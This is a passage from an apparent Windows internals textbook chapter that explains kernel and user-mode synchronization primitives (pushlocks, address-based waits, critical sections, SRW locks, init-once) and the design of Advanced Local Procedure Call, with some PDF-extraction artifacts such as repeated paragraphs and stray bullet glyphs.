situation that can occur when multiple threads of the same priority are all waiting on a lock and little
202
CHAPTER 8 System mechanisms
actual work gets done), and they are also self-optimizing: the list of threads waiting on a pushlock will
be periodically rearranged to provide fairer behavior when the pushlock is released.
One more performance optimization that is applicable to pushlock acquisition (including for address-
based pushlocks) is the opportunistic spinlock-like behavior during contention, before performing the
dispatcher object wait on the pushlock wait block’s event. If the system has at least one other unparked
processor (see Chapter 4 of Part 1 for more information on core parking), the kernel enters a tight spin-
based loop for ExpSpinCycleCount cycles just like a spinlock would, but without raising the IRQL, issuing
a yield instruction (such as a pause on x86/x64) for each iteration. If during any of the iterations, the push-
lock now appears to be released, an interlocked operation to acquire the pushlock is performed.
If the spin cycle times out, or the interlocked operation failed (due to a race), or if the system does
not have at least one additional unparked processor, then KeWaitForSingleObject is used on the event
object in the pushlock wait block. ExpSpinCycleCount is set to 10240 cycles on any machine with more
than one logical processor and is not configurable. For systems with an AMD processor that imple-
ments the MWAITT (MWAIT Timer) specification, the monitorx and mwaitx instructions are used
instead of a spin loop. This hardware-based feature enables waiting, at the CPU level, for the value at an
address to change without having to enter a loop, but they allow providing a timeout value so that the
wait is not indefinite (which the kernel supplies based on ExpSpinCycleCount).
On a final note, with the introduction of the AutoBoost feature (explained in Chapter 4 of Part 1),
pushlocks also leverage its capabilities by default, unless callers use the newer ExXxxPushLockXxxEx,
functions, which allow passing in the EX_PUSH_LOCK_FLAG_DISABLE_AUTOBOOST flag that disables
the functionality (which is not officially documented). By default, the non-Ex functions now call the
newer Ex functions, but without supplying the flag.
Address-based waits
Based on the lessons learned with keyed events, the key synchronization primitive that the Windows
kernel now exposes to user mode is the alert-by-ID system call (and its counterpart to wait-on-alert-by-
ID). With these two simple system calls, which require no memory allocations or handles, any number
of process-local synchronizations can be built, which will include the addressed-based waiting mecha-
nism we’re about to see, on top of which other primitives, such as critical sections and SRW locks, are
based upon.
Address-based waiting is based on three documented Win32 API calls: WaitOnAddress, WakeBy
AddressSingle, and WakeByAddressAll. These functions in KernelBase.dll are nothing more than for-
warders into Ntdll.dll, where the real implementations are present under similar names beginning with
Rtl, standing for Run Time Library. The Wait API takes in an address pointing to a value of interest, the
size of the value (up to 8 bytes), and the address of the undesired value, plus a timeout. The Wake APIs
take in the address only.
First, RtlWaitOnAddress builds a local address wait block tracking the thread ID and address and
inserts it into a per-process hash table located in the Process Environment Block (PEB). This mir-
rors the work done by ExBlockOnAddressPushLock as we saw earlier, except that a hash table wasn’t
needed because the caller had to store a push lock pointer somewhere. Next, just like the kernel API,
RtlWaitOnAddress checks whether the target address already has a value different than the undesirable
CHAPTER 8 System mechanisms
203
one and, if so, removes the address wait block, returning FALSE. Otherwise, it will call an internal func-
tion to block.
If there is more than one unparked processor available, the blocking function will first attempt to
avoid entering the kernel by spinning in user mode on the value of the address wait block bit indicating
availability, based on the value of RtlpWaitOnAddressSpinCount, which is hardcoded to 1024 as long as
the system has more than one processor. If the wait block still indicates contention, a system call is now
made to the kernel using NtWaitForAlertByThreadId, passing in the address as the hint parameter, as
well as the timeout.
If the function returns due to a timeout, a flag is set in the address wait block to indicate this, and
the block is removed, with the function returning STATUS_TIMEOUT. However, there is a subtle race
condition where the caller may have called the Wake function just a few cycles after the wait has timed
out. Because the wait block flag is modified with a compare-exchange instruction, the code can detect
this and actually calls NtWaitForAlertByThreadId a second time, this time without a timeout. This is
guaranteed to return because the code knows that a wake is in progress. Note that in nontimeout
cases, there’s no need to remove the wait block, because the waker has already done so.
On the writer’s side, both RtlWakeOnAddressSingle and RtlWakeOnAddressAll leverage the same
helper function, which hashes the input address and looks it up in the PEB’s hash table introduced
earlier in this section. Carefully synchronizing with compare-exchange instructions, it removes the
address wait block from the hash table, and, if committed to wake up any waiters, it iterates over all
matching wait blocks for the same address, calling NtAlertThreadByThreadId for each of them, in the
All usage of the API, or only the first one, in the Single version of the API.
With this implementation, we essentially now have a user-mode implementation of keyed events
that does not rely on any kernel object or handle, not even a single global one, completely removing
any failures in low-resource conditions. The only thing the kernel is responsible for is putting the thread
in a wait state or waking up the thread from that wait state.
The next few sections cover various primitives that leverage this functionality to provide synchroni-
zation during contention.
Critical sections
Critical sections are one of the main synchronization primitives that Windows provides to user-mode
application developers on top of the kernel-based synchronization primitives. Critical sections and the
other user-mode primitives you’ll see later have one major advantage over their kernel counterparts,
which is saving a round trip to kernel mode in cases in which the lock is noncontended (which is typi-
cally 99 percent of the time or more). Contended cases still require calling the kernel, however, because
it is the only piece of the system that can perform the complex waking and dispatching logic required
to make these objects work.
Critical sections can remain in user mode by using a local bit to provide the main exclusive locking
logic, much like a pushlock. If the bit is 0, the critical section can be acquired, and the owner sets the bit
to 1. This operation doesn’t require calling the kernel but uses the interlocked CPU operations dis-
cussed earlier. Releasing the critical section behaves similarly, with bit state changing from 1 to 0 with
204
CHAPTER 8 System mechanisms
an interlocked operation. On the other hand, as you can probably guess, when the bit is already 1 and
another caller attempts to acquire the critical section, the kernel must be called to put the thread in a
wait state.
Akin to pushlocks and address-based waits, critical sections implement a further optimiza-
tion to avoid entering the kernel: spinning, much like a spinlock (albeit at IRQL 0—Passive Level)
on the lock bit, hoping it clears up quickly enough to avoid the blocking wait. By default, this
is set to 2000 cycles, but it can be configured differently by using the InitializeCriticalSectionEx
or InitializeCriticalSectionAndSpinCount API at creation time, or later, by calling
SetCriticalSectionSpinCount.
Note As we discussed, because WaitForAddressSingle already implements a busy spin wait
as an optimization, with a default 1024 cycles, technically there are 3024 cycles spent spin-
ning by default—first on the critical sections’ lock bit and then on the wait address block’s
lock bit, before actually entering the kernel.
When they do need to enter the true contention path, critical sections will, the first time they’re
called, attempt to initialize their LockSemaphore field. On modern versions of Windows, this is only done
if RtlpForceCSToUseEvents is set, which is the case if the KACF_ALLOCDEBUGINFOFORCRITSECTIONS
(0x400000) flag is set through the Application Compatibility Database on the current process. If the flag
is set, however, the underlying dispatcher event object will be created (even if the field refers to sema-
phore, the object is an event). Then, assuming that the event was created, a call to WaitForSingleObject is
performed to block on the critical section (typically with a per-process configurable timeout value, to aid
in the debugging of deadlocks, after which the wait is reattempted).
In cases where the application compatibility shim was not requested, or in extreme low-memory
conditions where the shim was requested but the event could not be created, critical sections no
longer use the event (nor any of the keyed event functionality described earlier). Instead, they directly
leverage the address-based wait mechanism described earlier (also with the same deadlock detection
timeout mechanism from the previous paragraph). The address of the local bit is supplied to the call
to WaitOnAddress, and as soon as the critical section is released by LeaveCriticalSection, it either calls
SetEvent on the event object or WakeAddressSingle on the local bit.
Note Even though we’ve been referring to APIs by their Win32 name, in reality, critical
sections are implemented by Ntdll.dll, and KernelBase.dll merely forwards the functions
to identical functions starting with Rtl instead, as they are part of the Run Time Library.
Therefore, RtlLeaveCriticalSection calls NtSetEvent. RtlWakeAddressSingle, and so on.
Finally, because critical sections are not kernel objects, they have certain limitations. The primary
one is that you cannot obtain a kernel handle to a critical section; as such, no security, naming, or other
Object Manager functionality can be applied to a critical section. Two processes cannot use the same
critical section to coordinate their operations, nor can duplication or inheritance be used.
CHAPTER 8 System mechanisms
205
User-mode resources
User-mode resources also provide more fine-grained locking mechanisms than kernel primitives. A
resource can be acquired for shared mode or for exclusive mode, allowing it to function as a multiple-
reader (shared), single-writer (exclusive) lock for data structures such as databases. When a resource is
acquired in shared mode and other threads attempt to acquire the same resource, no trip to the kernel
is required because none of the threads will be waiting. Only when a thread attempts to acquire the
resource for exclusive access, or the resource is already locked by an exclusive owner, is this required.
To make use of the same dispatching and synchronization mechanism you saw in the kernel, resources
make use of existing kernel primitives. A resource data structure (RTL_RESOURCE) contains handles
to two kernel semaphore objects. When the resource is acquired exclusively by more than one thread,
the resource releases the exclusive semaphore with a single release count because it permits only one
owner. When the resource is acquired in shared mode by more than one thread, the resource releases
the shared semaphore with as many release counts as the number of shared owners. This level of detail
is typically hidden from the programmer, and these internal objects should never be used directly.
Resources were originally implemented to support the SAM (or Security Account Manager, which is
discussed in Chapter 7 of Part 1) and not exposed through the Windows API for standard applications.
Slim Reader-Writer Locks (SRW Locks), described shortly, were later implemented to expose a similar
but highly optimized locking primitive through a documented API, although some system components
still use the resource mechanism.
Condition variables
Condition variables provide a Windows native implementation for synchronizing a set of threads that
are waiting on a specific result to a conditional test. Although this operation was possible with other
user-mode synchronization methods, there was no atomic mechanism to check the result of the condi-
tional test and to begin waiting on a change in the result. This required that additional synchronization
be used around such pieces of code.
A user-mode thread initializes a condition variable by calling InitializeConditionVariable to set up the
initial state. When it wants to initiate a wait on the variable, it can call SleepConditionVariableCS, which
uses a critical section (that the thread must have initialized) to wait for changes to the variable, or, even
better, SleepConditionVariableSRW, which instead uses a Slim Reader/Writer (SRW) lock, which we de-
scribe next, giving the caller the advantage to do a shared (reader) of exclusive (writer) acquisition.
Meanwhile, the setting thread must use WakeConditionVariable (or WakeAllConditionVariable) after
it has modified the variable. This call releases the critical section or SRW lock of either one or all waiting
threads, depending on which function was used. If this sounds like address-based waiting, it’s because
it is—with the additional guarantee of the atomic compare-and-wait operation. Additionally, condition
variables were implemented before address-based waiting (and thus, before alert-by-ID) and had to
rely on keyed events instead, which were only a close approximation of the desired behavior.
Before condition variables, it was common to use either a notification event or a synchronization
event (recall that these are referred to as auto-reset or manual-reset in the Windows API) to signal the
206
CHAPTER 8 System mechanisms
change to a variable, such as the state of a worker queue. Waiting for a change required a critical section
to be acquired and then released, followed by a wait on an event. After the wait, the critical section
had to be reacquired. During this series of acquisitions and releases, the thread might have switched
contexts, causing problems if one of the threads called PulseEvent (a similar problem to the one that
keyed events solve by forcing a wait for the signaling thread if there is no waiter). With condition
variables, acquisition of the critical section or SRW lock can be maintained by the application while
SleepConditionVariableCS/SRW is called and can be released only after the actual work is done. This
makes writing work-queue code (and similar implementations) much simpler and predictable.
With both SRW locks and critical sections moving to the address-based wait primitives, however,
conditional variables can now directly leverage NtWaitForAlertByThreadId and directly signal the
thread, while building a conditional variable wait block that’s structurally similar to the address wait
block we described earlier. The need for keyed events is thus completely elided, and they remain only
for backward compatibility.
Slim Reader/Writer (SRW) locks
Although condition variables are a synchronization mechanism, they are not fully primitive locks
because they do implicit value comparisons around their locking behavior and rely on higher-
level abstractions to be provided (namely, a lock!). Meanwhile, address-based waiting is a primitive
operation, but it provides only the basic synchronization primitive, not true locking. In between these
two worlds, Windows has a true locking primitive, which is nearly identical to a pushlock: the Slim
Reader/Writer lock (SRW lock).
Like their kernel counterparts, SRW locks are also pointer sized, use atomic operations for acquisition
and release, rearrange their waiter lists, protect against lock convoys, and can be acquired both in
shared and exclusive mode. Just like pushlocks, SRW locks can be upgraded, or converted, from shared
to exclusive and vice versa, and they have the same restrictions around recursive acquisition. The only
real difference is that SRW locks are exclusive to user-mode code, whereas pushlocks are exclusive to
kernel-mode code, and the two cannot be shared or exposed from one layer to the other. Because
SRW locks also use the NtWaitForAlertByThreadId primitive, they require no memory allocation and are
guaranteed never to fail (other than through incorrect usage).
Not only can SRW locks entirely replace critical sections in application code, which reduces the need to
allocate the large CRITICAL_SECTION structure (and which previously required the creation of an event
object), but they also offer multiple-reader, single-writer functionality. SRW locks must first be initialized
with InitializeSRWLock or can be statically initialized with a sentinel value, after which they can be ac-
quired or released in either exclusive or shared mode with the appropriate APIs: AcquireSRWLockExclusive,
ReleaseSRWLockExclusive, AcquireSRWLockShared, and ReleaseSRWLockShared. APIs also exist for op-
portunistically trying to acquire the lock, guaranteeing that no blocking operation will occur, as well as
converting the lock from one mode to another.
CHAPTER 8 System mechanisms
207
Note Unlike most other Windows APIs, the SRW locking functions do not return with a
value—instead, they generate exceptions if the lock could not be acquired. This makes
it obvious that an acquisition has failed so that code that assumes success will terminate
instead of potentially proceeding to corrupt user data. Since SRW locks do not fail due to
resource exhaustion, the only such exception possible is STATUS_RESOURCE_NOT_OWNED
in the case that a nonshared SRW lock is incorrectly being released in shared mode.
The Windows SRW locks do not prefer readers or writers, meaning that the performance for either
case should be the same. This makes them great replacements for critical sections, which are writer-
only or exclusive synchronization mechanisms, and they provide an optimized alternative to resources.
If SRW locks were optimized for readers, they would be poor exclusive-only locks, but this isn’t the
case. This is why we earlier mentioned that conditional variables can also use SRW locks through the
SleepConditionVariableSRW API. That being said, since keyed events are no longer used in one mecha-
nism (SRW) but are still used in the other (CS), address-based waiting has muted most benefits other
than code size—and the ability to have shared versus exclusive locking. Nevertheless, code targeting
older versions of Windows should use SRW locks to guarantee the increased benefits are there on
kernels that still used keyed events.
Run once initialization
The ability to guarantee the atomic execution of a piece of code responsible for performing some sort
of initialization task—such as allocating memory, initializing certain variables, or even creating objects
on demand—is a typical problem in multithreaded programming. In a piece of code that can be called
simultaneously by multiple threads (a good example is the DllMain routine, which initializes a DLL), there
are several ways of attempting to ensure the correct, atomic, and unique execution of initialization tasks.
For this scenario, Windows implements init once, or one-time initialization (also called run once ini-
tialization internally). The API exists both as a Win32 variant, which calls into Ntdll.dll’s Run Time Library
(Rtl) as all the other previously seen mechanisms do, as well as the documented Rtl set of APIs, which
are exposed to kernel programmers in Ntoskrnl.exe instead (obviously, user-mode developers could
bypass Win32 and use the Rtl functions in Ntdll.dll too, but that is never recommended). The only dif-
ference between the two implementations is that the kernel ends up using an event object for synchro-
nization, whereas user mode uses a keyed event instead (in fact, it passes in a NULL handle to use the
low-memory keyed event that was previously used by critical sections).
Note Since recent versions of Windows now implement an address-based pushlock in
kernel mode, as well as the address-based wait primitive in user mode, the Rtl library could
probably be updated to use RtlWakeAddressSingle and ExBlockOnAddressPushLock, and in
fact a future version of Windows could always do that—the keyed event merely provided a
more similar interface to a dispatcher event object in older Windows versions. As always, do
not rely on the internal details presented in this book, as they are subject to change.
208
CHAPTER 8 System mechanisms
The init once mechanism allows for both synchronous (meaning that the other threads must wait for
initialization to complete) execution of a certain piece of code, as well as asynchronous (meaning that
the other threads can attempt to do their own initialization and race) execution. We look at the logic
behind asynchronous execution after explaining the synchronous mechanism.
In the synchronous case, the developer writes the piece of code that would normally execute after
double-checking the global variable in a dedicated function. Any information that this routine needs
can be passed through the parameter variable that the init once routine accepts. Any output infor-
mation is returned through the context variable. (The status of the initialization itself is returned as
a Boolean.) All the developer has to do to ensure proper execution is call InitOnceExecuteOnce with
the parameter, context, and run-once function pointer after initializing an INIT_ONCE object with
InitOnceInitialize API. The system takes care of the rest.
For applications that want to use the asynchronous model instead, the threads call
InitOnceBeginInitialize and receive a BOOLEAN pending status and the context described earlier. If the
pending status is FALSE, initialization has already taken place, and the thread uses the context value
for the result. (It’s also possible for the function to return FALSE, meaning that initialization failed.)
However, if the pending status comes back as TRUE, the thread should race to be the first to create the
object. The code that follows performs whatever initialization tasks are required, such as creating ob-
jects or allocating memory. When this work is done, the thread calls InitOnceComplete with the result of
the work as the context and receives a BOOLEAN status. If the status is TRUE, the thread won the race,
and the object that it created or allocated is the one that will be the global object. The thread can now
save this object or return it to a caller, depending on the usage.
In the more complex scenario when the status is FALSE, this means that the thread lost the race.
The thread must undo all the work it did, such as deleting objects or freeing memory, and then call
InitOnceBeginInitialize again. However, instead of requesting to start a race as it did initially, it uses the
INIT_ONCE_CHECK_ONLY flag, knowing that it has lost, and requests the winner’s context instead (for
example, the objects or memory that were created or allocated by the winner). This returns another
status, which can be TRUE, meaning that the context is valid and should be used or returned to the
caller, or FALSE, meaning that initialization failed and nobody has been able to perform the work (such
as in the case of a low-memory condition, perhaps).
In both cases, the mechanism for run-once initialization is similar to the mechanism for condition
variables and SRW locks. The init once structure is pointer-size, and inline assembly versions of the SRW
acquisition/release code are used for the noncontended case, whereas keyed events are used when
contention has occurred (which happens when the mechanism is used in synchronous mode) and the
other threads must wait for initialization. In the asynchronous case, the locks are used in shared mode,
so multiple threads can perform initialization at the same time. Although not as highly efficient as the
alert-by-ID primitive, the usage of a keyed event still guarantees that the init once mechanism will func-
tion even in most cases of memory exhaustion.
CHAPTER 8 System mechanisms
209
Advanced local procedure call
All modern operating systems require a mechanism for securely and efficiently transferring data
between one or more processes in user mode, as well as between a service in the kernel and clients in
user mode. Typically, UNIX mechanisms such as mailslots, files, named pipes, and sockets are used for
portability, whereas in other cases, developers can use OS-specific functionality, such as the ubiquitous
window messages used in Win32 graphical applications. In addition, Windows also implements an
internal IPC mechanism called Advanced (or Asynchronous) Local Procedure Call, or ALPC, which is a
high-speed, scalable, and secured facility for message passing arbitrary-size messages.
Note ALPC is the replacement for an older IPC mechanism initially shipped with the very
first kernel design of Windows NT, called LPC, which is why certain variables, fields, and
functions might still refer to “LPC” today. Keep in mind that LPC is now emulated on top of
ALPC for compatibility and has been removed from the kernel (legacy system calls still exist,
which get wrapped into ALPC calls).
Although it is internal, and thus not available for third-party developers, ALPC is widely used in vari-
ous parts of Windows:
I
Windows applications that use remote procedure call (RPC), a documented API, indirectly use
ALPC when they specify local-RPC over the ncalrpc transport, a form of RPC used to communi-
cate between processes on the same system. This is now the default transport for almost all RPC
clients. In addition, when Windows drivers leverage kernel-mode RPC, this implicitly uses ALPC
as well as the only transport permitted.
I
Whenever a Windows process and/or thread starts, as well as during any Windows subsystem
operation, ALPC is used to communicate with the subsystem process (CSRSS). All subsystems
communicate with the session manager (SMSS) over ALPC.
I
When a Windows process raises an exception, the kernel’s exception dispatcher communicates
with the Windows Error Reporting (WER) Service by using ALPC. Processes also can communi-
cate with WER on their own, such as from the unhandled exception handler. (WER is discussed
later in Chapter 10.)
I
Winlogon uses ALPC to communicate with the local security authentication process, LSASS.
I
The security reference monitor (an executive component explained in Chapter 7 of Part 1) uses
ALPC to communicate with the LSASS process.
I
The user-mode power manager and power monitor communicate with the kernel-mode power
manager over ALPC, such as whenever the LCD brightness is changed.
I
The User-Mode Driver Framework (UMDF) enables user-mode drivers to communicate with the
kernel-mode reflector driver by using ALPC.
210
CHAPTER 8 System mechanisms
I
The new Core Messaging mechanism used by CoreUI and modern UWP UI components use
ALPC to both register with the Core Messaging Registrar, as well as to send serialized message
objects, which replace the legacy Win32 window message model.
I
The Isolated LSASS process, when Credential Guard is enabled, communicates with LSASS by
using ALPC. Similarly, the Secure Kernel transmits trustlet crash dump information through
ALPC to WER.
I
As you can see from these examples, ALPC communication crosses all possible types of secu-
rity boundaries—from unprivileged applications to the kernel, from VTL 1 trustlets to VTL 0
services, and everything in between. Therefore, security and performance were critical require-
ments in its design.
Connection model
Typically, ALPC messages are used between a server process and one or more client processes of that
server. An ALPC connection can be established between two or more user-mode processes or between
a kernel-mode component and one or more user-mode processes, or even between two kernel-mode
components (albeit this would not be the most efficient way of communicating). ALPC exposes a single
executive object called the port object to maintain the state needed for communication. Although this
is just one object, there are several kinds of ALPC ports that it can represent:
I
Server connection port A named port that is a server connection request point. Clients can
connect to the server by connecting to this port.
I
Server communication port An unnamed port a server uses to communicate with one of its
clients. The server has one such port per active client.
I
Client communication port An unnamed port each client uses to communicate with its server.
I
Unconnected communication port An unnamed port a client can use to communicate
locally with itself. This model was abolished in the move from LPC to ALPC but is emulated for
Legacy LPC for compatibility reasons.
ALPC follows a connection and communication model that’s somewhat reminiscent of BSD socket
programming. A server first creates a server connection port (NtAlpcCreatePort), whereas a cli-
ent attempts to connect to it (NtAlpcConnectPort). If the server was in a listening state (by using
NtAlpcSendWaitReceivePort), it receives a connection request message and can choose to accept it
(NtAlpcAcceptConnectPort). In doing so, both the client and server communication ports are created,
and each respective endpoint process receives a handle to its communication port. Messages are
then sent across this handle (still by using NtAlpcSendWaitReceivePort), which the server continues to
receive by using the same API. Therefore, in the simplest scenario, a single server thread sits in a loop
calling NtAlpcSendWaitReceivePort and receives with connection requests, which it accepts, or mes-
sages, which it handles and potentially responds to. The server can differentiate between messages by
reading the PORT_HEADER structure, which sits on top of every message and contains a message type.
The various message types are shown in Table 8-30.
CHAPTER 8 System mechanisms
211
TABLE 8-30 ALPC message types
pe
Meaning
LPC_REQUEST
A normal ALPC message, with a potential synchronous reply
LPC_REPLY
An ALPC message datagram, sent as an asynchronous reply to a previous datagram
LPC_DATAGRAM
An ALPC message datagram, which is immediately released and cannot be synchro-
nously replied to
LPC_LOST_REPLY
Deprecated, used by Legacy LPC Reply API
LPC_PORT_CLOSED
Sent whenever the last handle of an ALPC port is closed, notifying clients and servers
that the other side is gone
LPC_CLIENT_DIED
Sent by the process manager (PspExitThread) using Legacy LPC to the registered termi-
nation port(s) of the thread and the registered exception port of the process
LPC_EXCEPTION
Sent by the User-Mode Debugging Framework (DbgkForwardException) to the excep-
tion port through Legacy LPC
LPC_DEBUG_EVENT
Deprecated, used by the legacy user-mode debugging services when these were part
of the Windows subsystem
LPC_ERROR_EVENT
Sent whenever a hard error is generated from user-mode (NtRaiseHardError) and sent
using Legacy LPC to exception port of the target thread, if any, otherwise to the error
port, typically owned by CSRSS
LPC_CONNECTION_REQUEST
An ALPC message that represents an attempt by a client to connect to the server’s con-
nection port
LPC_CONNECTION_REPLY
The internal message that is sent by a server when it calls NtAlpcAcceptConnectPort to
accept a client’s connection request
LPC_CANCELED
The received reply by a client or server that was waiting for a message that has now
been canceled
LPC_UNREGISTER_PROCESS
Sent by the process manager when the exception port for the current process is
swapped to a different one, allowing the owner (typically CSRSS) to unregister its data
structures for the thread switching its port to a different one
The server can also deny the connection, either for security reasons or simply due to protocol or
versioning issues. Because clients can send a custom payload with a connection request, this is usu-
ally used by various services to ensure that the correct client, or only one client, is talking to the server.
If any anomalies are found, the server can reject the connection and, optionally, return a payload
containing information on why the client was rejected (allowing the client to take corrective action, if
possible, or for debugging purposes).
Once a connection is made, a connection information structure (actually, a blob, as we describe
shortly) stores the linkage between all the different ports, as shown in Figure 8-40.
212
CHAPTER 8 System mechanisms
Handle
Client view
of section
Handle
Handle
Server view
of section
Client
communication
port
Server
communication
port
Kernel address space
Client address
space
Client process
Connection port
Server address
space
Server process
Message
queue
Shared
section
FIGURE 8-40 Use of ALPC ports.
Message model
Using ALPC, a client and thread using blocking messages each take turns performing a loop around the
NtAlpcSendWaitReceivePort system call, in which one side sends a request and waits for a reply while
the other side does the opposite. However, because ALPC supports asynchronous messages, it’s pos-
sible for either side not to block and choose instead to perform some other runtime task and check for
messages later (some of these methods will be described shortly). ALPC supports the following three
methods of exchanging payloads sent with a message:
I
A message can be sent to another process through the standard double-buffering mecha-
nism, in which the kernel maintains a copy of the message (copying it from the source process),
switches to the target process, and copies the data from the kernel’s buffer. For compatibility, if
legacy LPC is being used, only messages of up to 256 bytes can be sent this way, whereas ALPC
can allocate an extension buffer for messages up to 64 KB.
I
A message can be stored in an ALPC section object from which the client and server processes
map views. (See Chapter 5 in Part 1 for more information on section mappings.)
An important side effect of the ability to send asynchronous messages is that a message can be can-
celed—for example, when a request takes too long or if the user has indicated that they want to cancel
the operation it implements. ALPC supports this with the NtAlpcCancelMessage system call.
CHAPTER 8 System mechanisms
213
An ALPC message can be on one of five different queues implemented by the ALPC port object:
I
Main queue A message has been sent, and the client is processing it.
I
Pending queue A message has been sent and the caller is waiting for a reply, but the reply
has not yet been sent.
I
Large message queue A message has been sent, but the caller’s buffer was too small to
receive it. The caller gets another chance to allocate a larger buffer and request the message
payload again.
I
Canceled queue A message that was sent to the port but has since been canceled.
I
Direct queue A message that was sent with a direct event attached.
Note that a sixth queue, called the wait queue, does not link messages together; instead, it links all
the threads waiting on a message.
EXPERIMENT: Viewing subsystem ALPC port objects
You can see named ALPC port objects with the WinObj tool from Sysinternals or WinObjEx64
from GitHub. Run one of the two tools elevated as Administrator and select the root directory. A
gear icon identifies the port objects in WinObj, and a power plug in WinObjEx64, as shown here
(you can also click on the Type field to easily sort all the objects by their type):
EXPERIMENT: Viewing subsystem ALPC port objects
You can see named ALPC port objects with the WinObj tool from Sysinternals or WinObjEx64
from GitHub. Run one of the two tools elevated as Administrator and select the root directory. A
gear icon identifies the port objects in WinObj, and a power plug in WinObjEx64, as shown here
(you can also click on the Type field to easily sort all the objects by their type):
214
CHAPTER 8 System mechanisms
You should see the ALPC ports used by the power manager, the security manager, and
other internal Windows services. If you want to see the ALPC port objects used by RPC, you can
select the \RPC Control directory. One of the primary users of ALPC, outside of Local RPC, is the
Windows subsystem, which uses ALPC to communicate with the Windows subsystem DLLs that
are present in all Windows processes. Because CSRSS loads once for each session, you will find its
ALPC port objects under the appropriate \Sessions\X\Windows directory, as shown here:
Asynchronous operation
The synchronous model of ALPC is tied to the original LPC architecture in the early NT design and is
similar to other blocking IPC mechanisms, such as Mach ports. Although it is simple to design, a block-
ing IPC algorithm includes many possibilities for deadlock, and working around those scenarios creates
complex code that requires support for a more flexible asynchronous (nonblocking) model. As such,
ALPC was primarily designed to support asynchronous operation as well, which is a requirement for
scalable RPC and other uses, such as support for pending I/O in user-mode drivers. A basic feature of
ALPC, which wasn’t originally present in LPC, is that blocking calls can have a timeout parameter. This
allows legacy applications to avoid certain deadlock scenarios.
However, ALPC is optimized for asynchronous messages and provides three different models for
asynchronous notifications. The first doesn’t actually notify the client or server but simply copies the
data payload. Under this model, it’s up to the implementor to choose a reliable synchronization meth-
od. For example, the client and the server can share a notification event object, or the client can poll for
data arrival. The data structure used by this model is the ALPC completion list (not to be confused with
You should see the ALPC ports used by the power manager, the security manager, and
other internal Windows services. If you want to see the ALPC port objects used by RPC, you can
select the \RPC Control directory. One of the primary users of ALPC, outside of Local RPC, is the
Windows subsystem, which uses ALPC to communicate with the Windows subsystem DLLs that
are present in all Windows processes. Because CSRSS loads once for each session, you will find its
ALPC port objects under the appropriate \Sessions\X\Windows directory, as shown here:
CHAPTER 8 System mechanisms
215
the Windows I/O completion port). The ALPC completion list is an efficient, nonblocking data struc-
ture that enables atomic passing of data between clients, and its internals are described further in the
upcoming “Performance” section.
The next notification model is a waiting model that uses the Windows completion-port mechanism
(on top of the ALPC completion list). This enables a thread to retrieve multiple payloads at once, control
the maximum number of concurrent requests, and take advantage of native completion-port function-
ality. The user-mode thread pool implementation provides internal APIs that processes use to manage
ALPC messages within the same infrastructure as worker threads, which are implemented using this
model. The RPC system in Windows, when using Local RPC (over ncalrpc), also makes use of this func-
tionality to provide efficient message delivery by taking advantage of this kernel support, as does the
kernel mode RPC runtime in Msrpc.sys.
Finally, because drivers can run in arbitrary context and typically do not like creating dedicated
system threads for their operation, ALPC also provides a mechanism for a more basic, kernel-based
notification using executive callback objects. A driver can register its own callback and context with
NtSetInformationAlpcPort, after which it will get called whenever a message is received. The Power
Dependency Coordinator (Pdc.sys) in the kernel employs this mechanism for communicating with its
clients, for example. It’s worth noting that using an executive callback object has potential advantag-
es—but also security risks—in terms of performance. Because the callbacks are executed in a blocking
fashion (once signaled), and inline with the signaling code, they will always run in the context of an
ALPC message sender (that is, inline with a user-mode thread calling NtAlpcSendWaitReceivePort). This
means that the kernel component can have the chance to examine the state of its client without the
cost of a context switch and can potentially consume the payload in the context of the sender.
The reason these are not absolute guarantees, however (and this becomes a risk if the implementor
is unaware), is that multiple clients can send a message to the port at the same time and existing mes-
sages can be sent by a client before the server registers its executive callback object. It’s also possible
for another client to send yet another message while the server is still processing the first message from
a different client. In all these cases, the server will run in the context of one of the clients that sent a
message but may be analyzing a message sent by a different client. The server should distinguish this
situation (since the Client ID of the sender is encoded in the PORT_HEADER of the message) and attach/
analyze the state of the correct sender (which now has a potential context switch cost).
Views, regions, and sections
Instead of sending message buffers between their two respective processes, a server and client
can choose a more efficient data-passing mechanism that is at the core of the memory manager in
Windows: the section object. (More information is available in Chapter 5 in Part 1.) This allows a piece of
memory to be allocated as shared and for both client and server to have a consistent, and equal, view
of this memory. In this scenario, as much data as can fit can be transferred, and data is merely copied
into one address range and immediately available in the other. Unfortunately, shared-memory com-
munication, such as LPC traditionally provided, has its share of drawbacks, especially when considering
security ramifications. For one, because both client and server must have access to the shared memory,
an unprivileged client can use this to corrupt the server’s shared memory and even build executable
216
CHAPTER 8 System mechanisms
payloads for potential exploits. Additionally, because the client knows the location of the server’s data,
it can use this information to bypass ASLR protections. (See Chapter 5 in Part 1 for more information.)
ALPC provides its own security on top of what’s provided by section objects. With ALPC, a specific
ALPC section object must be created with the appropriate NtAlpcCreatePortSection API, which creates
the correct references to the port, as well as allows for automatic section garbage collection. (A manual
API also exists for deletion.) As the owner of the ALPC section object begins using the section, the al-
located chunks are created as ALPC regions, which represent a range of used addresses within the sec-
tion and add an extra reference to the message. Finally, within a range of shared memory, the clients
obtain views to this memory, which represents the local mapping within their address space.
Regions also support a couple of security options. First, regions can be mapped either using
a secure mode or an unsecure mode. In the secure mode, only two views (mappings) are allowed
to the region. This is typically used when a server wants to share data privately with a single cli-
ent process. Additionally, only one region for a given range of shared memory can be opened from
within the context of a given port. Finally, regions can also be marked with write-access protec-
tion, which enables only one process context (the server) to have write access to the view (by using
MmSecureVirtualMemoryAgainstWrites). Other clients, meanwhile, will have read-only access only.
These settings mitigate many privilege-escalation attacks that could happen due to attacks on shared
memory, and they make ALPC more resilient than typical IPC mechanisms.
Attributes
ALPC provides more than simple message passing; it also enables specific contextual information to
be added to each message and have the kernel track the validity, lifetime, and implementation of
that information. Users of ALPC can assign their own custom context information as well. Whether it’s
system-managed or user-managed, ALPC calls this data attributes. There are seven attributes that the
kernel manages:
I
The security attribute, which holds key information to allow impersonation of clients, as well as
advanced ALPC security functionality (which is described later).
I
The data view attribute, responsible for managing the different views associated with the
regions of an ALPC section. It is also used to set flags such as the auto-release flag, and when
replying, to unmap a view manually.
I
The context attribute, which allows user-managed context pointers to be placed on a port, as
well as on a specific message sent across the port. In addition, a sequence number, message ID,
and callback ID are stored here and managed by the kernel, which allows uniqueness, message-
based hashing, and sequencing to be implemented by users of ALPC.
I
The handle attribute, which contains information about which handles to associate with the
message (which is described in more detail later in the “Handle passing” section).
I
The token attribute, which can be used to get the Token ID, Authentication ID, and Modified ID
of the message sender, without using a full-blown security attribute (but which does not, on its
own, allow impersonation to occur).
CHAPTER 8 System mechanisms
